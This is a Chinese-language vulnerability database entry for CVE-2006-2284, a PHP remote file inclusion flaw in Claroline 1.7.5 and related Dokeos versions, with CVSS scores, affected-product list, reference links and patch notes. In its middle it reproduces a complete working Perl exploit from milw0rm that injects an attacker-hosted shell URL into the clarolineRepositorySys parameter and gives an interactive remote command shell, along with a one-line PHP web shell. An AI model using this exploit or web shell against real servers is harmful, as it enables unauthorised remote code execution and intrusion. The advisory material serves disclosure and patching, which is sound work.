CVE-2006-2284
CVSS6.8
发布时间 :2006-05-09 22:14:00
修订时间 :2011-03-07 21:35:52
NMCOE    

[原文]Multiple PHP remote file inclusion vulnerabilities in Claroline 1.7.5 allow remote attackers to execute arbitrary PHP code via a URL in the (1) clarolineRepositorySys parameter in ldap.inc.php and the (2) claro_CasLibPath parameter in casProcess.inc.php.


[CNNVD]Claroline 多个远程文件包含漏洞(CNNVD-200605-152)

        Claroline 1.7.5存在多个PHP远程文件包含漏洞。远程攻击者可以借助(1) ldap.inc.php中的clarolineRepositorySys参数和(2)casProcess.inc.php中的claro_CasLibPath参数当中的URL,执行任意PHP代码。

- CVSS (基础分值)

CVSS分值: 6.8 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: MEDIUM [漏洞利用存在一定的访问条件]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:claroline:claroline:1.6_rc1
cpe:/a:dokeos:dokeos:1.5
cpe:/a:dokeos:dokeos:1.5.4
cpe:/a:claroline:claroline:1.5
cpe:/a:claroline:claroline:1.7.5
cpe:/a:claroline:claroline:1.5.3
cpe:/a:claroline:claroline:1.6
cpe:/a:dokeos:dokeos:1.4
cpe:/a:dokeos:dokeos:1.6.4
cpe:/a:dokeos:dokeos:1.6_rc2
cpe:/a:claroline:claroline:1.6_beta
cpe:/a:claroline:claroline:1.7.2
cpe:/a:claroline:claroline:1.7.4
cpe:/a:claroline:claroline:1.5.4
cpe:/a:dokeos:dokeos:1.5.3
cpe:/a:dokeos:dokeos:1.5.5

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2284
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2284
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200605-152
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/17873
(PATCH)  BID  17873
http://secunia.com/advisories/20003
(VENDOR_ADVISORY)  SECUNIA  20003
http://www.vupen.com/english/advisories/2006/1701
(UNKNOWN)  VUPEN  ADV-2006-1701
http://www.securityfocus.com/archive/1/archive/1/433249/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060508 Claroline Open Source e-Learning 1.7.5 Remote File Include
http://milw0rm.com/exploits/1766
(UNKNOWN)  MILW0RM  1766
http://xforce.iss.net/xforce/xfdb/26280
(UNKNOWN)  XF  claroline-ldapinc-casprocessinc-file-include(26280)
http://www.osvdb.org/25316
(UNKNOWN)  OSVDB  25316
http://securityreason.com/securityalert/875
(UNKNOWN)  SREASON  875

- 漏洞信息

Claroline 多个远程文件包含漏洞
中危 输入验证
2006-05-09 00:00:00 2007-02-02 00:00:00
远程  
        Claroline 1.7.5存在多个PHP远程文件包含漏洞。远程攻击者可以借助(1) ldap.inc.php中的clarolineRepositorySys参数和(2)casProcess.inc.php中的claro_CasLibPath参数当中的URL,执行任意PHP代码。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        Dokeos Open Source Learning & Knowledge Management Tool 1.6.4
        Dokeos dokeos-1.6.4-patch1.zip
        http://www.dokeos.com/download/dokeos-1.6.4-patch1.zip

- 漏洞信息 (1766)

Claroline e-Learning 1.75 (ldap.inc.php) Remote File Inclusion Exploit (EDBID:1766)
php webapps
2006-05-08 Verified
0 beford
N/A [点击下载]
#!/usr/bin/perl
############
# Claroline Open Source e-Learning  1.7.5 Remote File Include
# Exploit & Advisorie:  beford <xbefordx gmail com>
#
# uso:# 	perl own.pl <host> <cmd-shell-url> <cmd-var>
# 		perl own.pl http://host.com/claroline/auth/ http://atacante/shell.gif cmd
#
# cmd shell example: <? system($cmd); ?>
# cmd variable: cmd;
#
#############
# Description
#############
# Vendor: http://www.claroline.net
# The file claroline/auth/extauth/drivers/ldap.inc.php uses the variable 
# clarolineRepositorySys in a include() function without being declared. 
# There are other files vulnerable in the same folder, this exploit only
# attacks ldap.inc.php
#
# There is other vulnerable file claroline/auth/extauth/casProcess.inc.php
# it uses the claro_CasLibPath in a include function but this is not being
# declared either, so pwnt, RFI. Vendor was contacted through email, 
# no response, so i just posted this here and on its forum.
############
# Vulnerable code (lda.inc.php)
############
# return require $clarolineRepositorySys.'/auth/extauth/extAuthProcess.inc.php';
############
# Vulnerable code (casProcess.inc.php)
############
#if (   ! isset($_SESSION['init_CasCheckinDone'] )
#    || $logout
#    || ( basename($_SERVER['SCRIPT_NAME']) == 'login.php' && isset($_REQUEST['authModeReq']) && $_REQUEST['authModeReq'] == 'CAS' )
#    || isset($_REQUEST['fromCasServer']) )
#{
#    include_once $claro_CasLibPath;
############
use LWP::UserAgent;

$Path = $ARGV[0];
$Pathtocmd = $ARGV[1];
$cmdv = $ARGV[2];
if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv) { usage(); }
head();
while() {
	print "[shell] \$";
	while(<STDIN>)      {
		$cmd=$_;
		chomp($cmd);
		if (!$cmd) {last;}  
		$xpl = LWP::UserAgent->new() or die;
		$req = HTTP::Request->new(GET =>$Path.'extauth/drivers/ldap.inc.php?clarolineRepositorySys='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n";
		$res = $xpl->request($req);
		$return = $res->content;
		$return =~ tr/[\n]/[ê]/;
		if ($return =~/Error: HTTP request failed!/ ) {
			print "\nInvalid path for phpshell\n";
			exit;
		} elsif ($return =~/^<br.\/>.<b>Fatal.error/) {
			print "\nInvalid Command, error.\n\n";
		}
		if ($return =~ /(.*)/) {
			$finreturn = $1;
			$finreturn=~ tr/[ê]/[\n]/;
			print "\r\n$finreturn\n\r";
			last;
		} else {
			print "[shell] \$";
		}
	}
} last;

sub head()  { 
	print "\n============================================================================\r\n";
	print "  Claroline Open Source e-Learning  1.7.5 Remote File Include\r\n";
	print "============================================================================\r\n";
 }
 
sub usage() {
	head();
	print " Usage: perl own.pl <host> <url-cmd> <var>\r\n\n";
	print " <host> - Full Path to Authentication Dir : http://host/claroline/auth/do \r\n";
	print " <url-cmd> - PhpShell : http://atacate/shell.gif \r\n";
	print " <var> - var name used in phpshell : cmd  \r\n\r\n";
	exit();
 }

# milw0rm.com [2006-05-08]
		

- 漏洞信息

25315
Claroline ldap.inc.php clarolineRepositorySys Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

Claroline contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to claroline/auth/extauth/drivers/ldap.inc.php not properly sanitizing user input supplied to the 'clarolineRepositorySys' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

- 时间线

2006-05-08 Unknow
2006-05-08 Unknow

- 解决方案

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround: set the register_globals PHP option to 'off'

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站